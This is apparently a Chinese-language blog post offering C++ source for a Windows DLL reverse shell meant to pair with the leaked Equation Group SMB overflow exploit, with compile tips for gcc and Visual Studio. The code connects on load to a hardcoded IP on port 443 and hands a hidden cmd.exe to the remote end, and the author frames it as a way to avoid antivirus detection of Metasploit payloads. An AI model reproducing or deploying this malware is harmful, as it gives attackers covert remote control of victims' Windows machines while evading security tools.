dll nc 反弹代码

最近方程式smb 溢出很火 很多同学喜欢用metasploit 生成dll反弹很容易被杀
根据反弹代码改写了一个 dll反弹版
无编译环境的可以二进制修改ip和端口字符串。

gcc编译:
2019-07-20-17-21-21

运行效果:
2019-07-19-03-11-05

使用Visual Studio 2013 编译注意事项:

  1. 设置不使用预编译头或在代码中引入 stdafx.h
  2. win2003win2008 请使用在静态库中使用MFC方式
  3. 64位系统使用请编译为64位版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include <winsock2.h>
#include <stdlib.h>

#pragma comment(lib,"ws2_32")
void reverse_shell();
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{


switch (dwReason)
{
case DLL_PROCESS_ATTACH:
reverse_shell();
break;

case DLL_PROCESS_DETACH:

break;

case DLL_THREAD_ATTACH:

break;

case DLL_THREAD_DETACH:

break;
}
return TRUE;
}



void reverse_shell()
{
LPCSTR szMyUniqueNamedEvent = "sysnullevt";
HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);

switch (GetLastError())
{
// app is already running
case ERROR_ALREADY_EXISTS:
{
CloseHandle(m_hEvent);
break;
}

case ERROR_SUCCESS:
{

break;
}
}


WSAStartup(MAKEWORD(2, 2), &wsaData);
Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

hax.sin_family = AF_INET;
hax.sin_port = htons(atoi("443"));

hax.sin_addr.s_addr = inet_addr("172.31.139.141");
WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

memset(&ini_processo, 0, sizeof(ini_processo));
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);

}

dll下载